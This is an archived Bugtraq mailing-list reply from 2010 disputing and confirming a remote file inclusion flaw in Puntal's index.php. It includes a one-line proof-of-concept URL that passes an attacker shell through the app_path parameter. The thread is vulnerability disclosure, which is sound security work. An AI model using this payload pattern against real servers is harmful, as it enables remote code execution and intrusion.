[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: RE: Puntal (index.php) Remote File Inclusion Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: RE: Puntal (index.php) Remote File Inclusion Vulnerabilities
From: donald00@xxxxxxxx
Date: Mon, 3 May 2010 18:09:44 -0600

sorry Tom , in which line which confirms that the variable "app_path" and 
"puntal_path" is defined with functions to protect and handle inclusion or 
accessing to or from index.php file ?

please check again or Read the full script code in index.php file , and then 
please seen or check The example URI / P0C for this issue.

For verified or proofed this Vulnerabilities , I just Install Puntal , and this 
exploits is working.

http://localhost//path/index.php?app_path= <attacker shell>

Prev by Date: XSRF (CSRF) in eliteCMS
Next by Date: XSS in Acuity CMS
Previous by thread: Re: Puntal (index.php) Remote File Inclusion Vulnerabilities
Next by thread: [ MDVSA-2010:089 ] gnutls
Index(es):
- Date
- Thread